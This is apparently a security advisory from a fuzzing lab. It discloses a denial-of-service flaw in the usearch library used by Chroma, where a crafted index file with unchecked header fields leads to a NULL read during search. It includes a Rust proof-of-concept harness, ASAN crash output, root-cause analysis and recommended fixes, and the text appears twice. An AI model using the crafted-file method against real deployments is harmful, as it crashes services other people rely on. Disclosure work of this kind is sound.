What happened?
usearch Out-of-Bounds Read via Malicious Index File
Author(s): Nabih — Fuzzing Labs (nabih@fuzzinglabs.com)
Date: 2026-05-01
Executive Summary
A maliciously crafted usearch index file can trigger an out-of-bounds memory read leading to a NULL pointer dereference and deterministic application crash (Denial of Service) when loaded and then searched by Chroma. The root cause is that the serialized index format stores matrix_rows (node count) and matrix_cols (bytes per vector) as untrusted 32-bit fields; usearch's load_from_stream accepts these values verbatim with no cross-validation against the caller-supplied IndexOptions, causing vectors_lookup_ entries to become NULL. A subsequent search call passes that NULL pointer as the b_scalars argument to the NEON SIMD dot-product kernel, which immediately faults on the zero page.
ASAN confirms the crash (PID 63499): x[1] = 0x0000000000000000 is the NULL b_scalars pointer; x[0] = 0x0000602000000130 is the valid query vector (a_scalars); x[2] = 0x2 is count_scalars (dims = 2). The crash is deterministic and reproduces on every run against the provided artifact.
Vulnerability Details
- Severity: High (CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
- CWE: CWE-125 (Out-of-Bounds Read), CWE-476 (NULL Pointer Dereference), CWE-20 (Improper Input Validation)
- Affected Component:
usearch C++ library — include/usearch/index_dense.hpp, function load_from_stream(); crash site: simsimd_dot_f32_neon() (binary offset +0x14c)
| Component |
Version |
Notes |
chroma-index (Rust crate) |
All versions using usearch feature |
Direct consumer of usearch::Index::load_from_buffer |
usearch (Rust bindings + C++ library) |
= 2.23 (pinned) |
Root cause in C++ library |
unum-cloud/usearch (upstream C++) |
Confirmed in v2.x |
include/usearch/index_dense.hpp, load_from_stream |
simsimd (transitive dep) |
6.x |
Crash site: simsimd_dot_f32_neon |
Environment
- Distro Version: macOS/AArch64 (Apple M-series)
- Additional Details:
chroma-core/chroma repository — rust/index/fuzz/ crate; usearch 2.23 pinned in Cargo.toml
Steps to Reproduce
- Clone the Chroma repository and enter the fuzz crate:
git clone https://github.com/chroma-core/chroma
cd chroma/rust/index/fuzz
- Build with ASAN:
RUSTFLAGS="-Zsanitizer=address" cargo +nightly build --bin poc_asan_test --target aarch64-apple-darwin
- Run against the provided crash artifact:
./target/aarch64-apple-darwin/debug/poc_asan_test \
artifacts/fuzz_load_from_buffer/crash-1434c73f8820300eb2302038c4a4c557f4f172b9 \
2
Proof of Concept
use usearch::{Index, IndexOptions, MetricKind, ScalarKind};
fn main() {
let args: Vec<String> = std::env::args().collect();
if args.len() < 2 {
eprintln!("Usage: {} <crafted_binary> [dims] [metric]", args[0]);
std::process::exit(1);
}
let path = &args[1];
let dims: usize = args.get(2).and_then(|s| s.parse().ok()).unwrap_or(8);
let metric = match args.get(3).map(|s| s.as_str()) {
Some("cos") => MetricKind::Cos,
Some("l2") => MetricKind::L2sq,
_ => MetricKind::IP,
};
let data = std::fs::read(path).unwrap_or_else(|e| {
eprintln!("Failed to read {}: {}", path, e);
std::process::exit(1);
});
let node_count = u32::from_le_bytes(data[0..4].try_into().unwrap());
let byte_size = u32::from_le_bytes(data[4..8].try_into().unwrap());
println!("Header: node_count={}, byte_size={}", node_count, byte_size);
let options = IndexOptions {
dimensions: dims,
metric,
quantization: ScalarKind::F32,
connectivity: 32,
expansion_add: 128,
expansion_search: 64,
multi: false,
};
let index = Index::new(&options).unwrap();
println!("Calling load_from_buffer...");
match index.load_from_buffer(&data) {
Ok(_) => {
println!("Loaded OK: size={}, capacity={}", index.size(), index.capacity());
let query = vec![1.0f32; dims];
println!("Calling search({} dims, k=10)...", dims);
match index.search(&query, 10) { // <-- CRASH: b_scalars=NULL in SIMD kernel
Ok(r) => println!("Search OK: {} results", r.keys.len()),
Err(e) => println!("Search error: {}", e),
}
}
Err(e) => println!("Load failed: {}", e),
}
}
Root Cause Analysis
The serialized usearch dense index format begins with two attacker-controlled 32-bit fields:
Offset 0..3 : matrix_rows (u32 LE) — number of stored vectors
Offset 4..7 : matrix_cols (u32 LE) — bytes per vector (dims × sizeof(scalar))
Offset 8..N : raw vector data — matrix_rows × matrix_cols bytes
Offset N.. : "usearch" magic + HNSW header + graph adjacency data
Inside index_dense.hpp (~line 1101), load_from_stream reads these fields and uses them directly:
std::uint32_t dimensions[2];
input(&dimensions, sizeof(dimensions));
matrix_rows = dimensions[0]; // attacker-controlled
matrix_cols = dimensions[1]; // attacker-controlled
vectors_lookup_ = vectors_lookup_t(matrix_rows);
for (std::uint64_t slot = 0; slot != matrix_rows; ++slot) {
byte_t* vector = vectors_tape_allocator_.allocate(matrix_cols);
input(vector, matrix_cols);
vectors_lookup_[slot] = vector; // stores raw pointer — may be NULL if matrix_cols=0
}
Neither field is validated against metric_.bytes_per_vector() or the actual buffer length. When matrix_cols is inconsistent with the graph section that follows, vectors_lookup_ entries end up NULL. During search, the metric proxy fetches the stored pointer by graph-node slot and passes it as b_scalars to the SIMD kernel. ASAN confirms this pointer is 0x0 at x[1], causing a READ fault on the zero page inside simsimd_dot_f32_neon.
Detailed Behavior
load_from_buffer returns Ok(()) reporting size=16, capacity=16 — the index appears healthy. The crash occurs only on the first search call, making the load boundary ineffective as a detection point.
RUSTFLAGS="-Zsanitizer=address" cargo +nightly build \
--bin poc_asan_test --target aarch64-apple-darwin && \
./target/aarch64-apple-darwin/debug/poc_asan_test \
artifacts/fuzz_load_from_buffer/crash-1434c73f8820300eb2302038c4a4c557f4f172b9 \
2
AddressSanitizer:DEADLYSIGNAL
=================================================================
==63499==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000104d02450 bp 0x00016b11be30 sp 0x00016b11be20 T0)
==63499==The signal is caused by a READ memory access.
==63499==Hint: address points to the zero page.
#0 0x000104d02450 in simsimd_dot_f32_neon(float const*, float const*, unsigned long long, double*)+0x14c (poc_asan_test:arm64+0x100022450)
#1 0x000104cf94e4 in bool unum::usearch::index_gt<...>::search_to_find_in_base_<...>(...) const+0x454 (poc_asan_test:arm64+0x1000194e4)
#2 0x000104cf8dfc in unum::usearch::index_gt<...>::search_result_t unum::usearch::index_gt<...>::search<...>(...) const+0x1ac (poc_asan_test:arm64+0x100018dfc)
#3 0x000104cf8be4 in unum::usearch::index_dense_gt<...>::search_result_t unum::usearch::index_dense_gt<...>::search_<float, ...>(...) const+0xdc (poc_asan_test:arm64+0x100018be4)
#4 0x000104cf1958 in Matches search_<float>(...)+0x180 (poc_asan_test:arm64+0x100011958)
#5 0x000104cf17c0 in NativeIndex::search_f32(rust::cxxbridge1::Slice<float const>, unsigned long) const+0x50 (poc_asan_test:arm64+0x1000117c0)
#6 0x000104cf122c in cxxbridge1$194$NativeIndex$search_f32+0x18 (poc_asan_test:arm64+0x10001122c)
#7 0x000104cec72c in usearch::ffi::NativeIndex::search_f32::hf7202973838dba99+0x1f4 (poc_asan_test:arm64+0x10000c72c)
#8 0x000104ceb930 in _$LT$f32$u20$as$u20$usearch..VectorType$GT$::search::h252537b2eebe9ad0+0x44 (poc_asan_test:arm64+0x10000b930)
#9 0x000104ceb5ec in usearch::Index::search::h950c1e77d154d0b2 lib.rs:1144
#10 0x000104ce5dc4 in poc_asan_test::main::h6b9971fd57940859 poc_asan_test.rs:68
#11 0x000104ce0f94 in core::ops::function::FnOnce::call_once::hdb553c66484e4abe function.rs:250
#12 0x000104ce7f34 in std::sys::backtrace::__rust_begin_short_backtrace::h0fa6ff76a94e7bea backtrace.rs:158
#13 0x000104ce6d78 in std::rt::lang_start::{{closure}}::h845c899ffc3a2359 rt.rs:206
#14 0x000104d24e50 in std::rt::lang_start_internal::h5feb7ac2538e01ae+0x3fc (poc_asan_test:arm64+0x100044e50)
#15 0x000104ce6cac in std::rt::lang_start::h855a994d46e40637 rt.rs:205
#16 0x000104ce6518 in main+0x20 (poc_asan_test:arm64+0x100006518)
==63499==Register values:
x[0] = 0x0000602000000130 x[1] = 0x0000000000000000 x[2] = 0x0000000000000002 x[3] = 0x000000016b11be28
x[4] = 0x0000612000000240 x[5] = 0x0000000000000001 x[19] = 0x000061d000000080 x[20] = 0x0000000000000040
x[24] = 0x0000614000000040 x[25] = 0x0000000000000100 x[26] = 0x000061d0000000b0
SUMMARY: AddressSanitizer: SEGV (poc_asan_test:arm64+0x100022450) in simsimd_dot_f32_neon(float const*, float const*, unsigned long long, double*)+0x14c
==63499==ABORTING
The register dump maps directly onto the SIMD kernel's AArch64 calling convention:
x[0] = 0x0000602000000130 — a_scalars: the query vector, heap-allocated and valid
x[1] = 0x0000000000000000 — b_scalars: the stored-vector pointer from vectors_lookup_[slot], NULL due to the corrupted header; this is the faulting address
x[2] = 0x2 — count_scalars: 2, matching the dims=2 argument passed to the PoC
The fault is a READ at address 0x0 on the first loop iteration of simsimd_dot_f32_neon. The crash is fully deterministic — there is no write, so this is a pure read primitive with a fixed NULL crash address.
Recommendations
- Short-term (Chroma-side): Add a validation wrapper around
load_from_buffer in chroma-index before forwarding to usearch — verify matrix_cols == expected_dims * scalar_bytes and 8 + matrix_rows * matrix_cols <= data.len(). Return a ChromaError on any violation.
- Long-term (upstream usearch): Fix
load_from_stream in include/usearch/index_dense.hpp to reject any buffer where matrix_cols != metric_.bytes_per_vector(). Apply the same check to the view (memory-mapped) path where matrix_cols * slot can reference memory outside the mapped region.
- Defense-in-depth: Apply integrity verification (HMAC or content-hash) to index files stored in object storage before loading. Consider running the index-loading worker in a sandboxed subprocess (e.g.,
seccomp) to contain crashes. Enable ASAN in CI fuzz runs to catch regressions.
What happened?
usearch Out-of-Bounds Read via Malicious Index File
Author(s): Nabih — Fuzzing Labs (nabih@fuzzinglabs.com)
Date: 2026-05-01
Executive Summary
A maliciously crafted usearch index file can trigger an out-of-bounds memory read leading to a NULL pointer dereference and deterministic application crash (Denial of Service) when loaded and then searched by Chroma. The root cause is that the serialized index format stores
matrix_rows(node count) andmatrix_cols(bytes per vector) as untrusted 32-bit fields; usearch'sload_from_streamaccepts these values verbatim with no cross-validation against the caller-suppliedIndexOptions, causingvectors_lookup_entries to become NULL. A subsequentsearchcall passes that NULL pointer as theb_scalarsargument to the NEON SIMD dot-product kernel, which immediately faults on the zero page.ASAN confirms the crash (PID 63499):
x[1] = 0x0000000000000000is the NULLb_scalarspointer;x[0] = 0x0000602000000130is the valid query vector (a_scalars);x[2] = 0x2iscount_scalars(dims = 2). The crash is deterministic and reproduces on every run against the provided artifact.Vulnerability Details
usearchC++ library —include/usearch/index_dense.hpp, functionload_from_stream(); crash site:simsimd_dot_f32_neon()(binary offset+0x14c)chroma-index(Rust crate)usearchfeatureusearch::Index::load_from_bufferusearch(Rust bindings + C++ library)= 2.23(pinned)unum-cloud/usearch(upstream C++)include/usearch/index_dense.hpp,load_from_streamsimsimd(transitive dep)simsimd_dot_f32_neonEnvironment
chroma-core/chromarepository —rust/index/fuzz/crate; usearch 2.23 pinned inCargo.tomlSteps to Reproduce
git clone https://github.com/chroma-core/chroma cd chroma/rust/index/fuzzRUSTFLAGS="-Zsanitizer=address" cargo +nightly build --bin poc_asan_test --target aarch64-apple-darwin./target/aarch64-apple-darwin/debug/poc_asan_test \ artifacts/fuzz_load_from_buffer/crash-1434c73f8820300eb2302038c4a4c557f4f172b9 \ 2Proof of Concept
Root Cause Analysis
The serialized usearch dense index format begins with two attacker-controlled 32-bit fields:
Inside
index_dense.hpp(~line 1101),load_from_streamreads these fields and uses them directly:Neither field is validated against
metric_.bytes_per_vector()or the actual buffer length. Whenmatrix_colsis inconsistent with the graph section that follows,vectors_lookup_entries end up NULL. Duringsearch, the metric proxy fetches the stored pointer by graph-node slot and passes it asb_scalarsto the SIMD kernel. ASAN confirms this pointer is0x0atx[1], causing a READ fault on the zero page insidesimsimd_dot_f32_neon.Detailed Behavior
load_from_bufferreturnsOk(())reportingsize=16, capacity=16— the index appears healthy. The crash occurs only on the firstsearchcall, making the load boundary ineffective as a detection point.The register dump maps directly onto the SIMD kernel's AArch64 calling convention:
x[0] = 0x0000602000000130—a_scalars: the query vector, heap-allocated and validx[1] = 0x0000000000000000—b_scalars: the stored-vector pointer fromvectors_lookup_[slot], NULL due to the corrupted header; this is the faulting addressx[2] = 0x2—count_scalars: 2, matching thedims=2argument passed to the PoCThe fault is a READ at address
0x0on the first loop iteration ofsimsimd_dot_f32_neon. The crash is fully deterministic — there is no write, so this is a pure read primitive with a fixed NULL crash address.Recommendations
load_from_bufferinchroma-indexbefore forwarding to usearch — verifymatrix_cols == expected_dims * scalar_bytesand8 + matrix_rows * matrix_cols <= data.len(). Return aChromaErroron any violation.load_from_streamininclude/usearch/index_dense.hppto reject any buffer wherematrix_cols != metric_.bytes_per_vector(). Apply the same check to theview(memory-mapped) path wherematrix_cols * slotcan reference memory outside the mapped region.seccomp) to contain crashes. Enable ASAN in CI fuzz runs to catch regressions.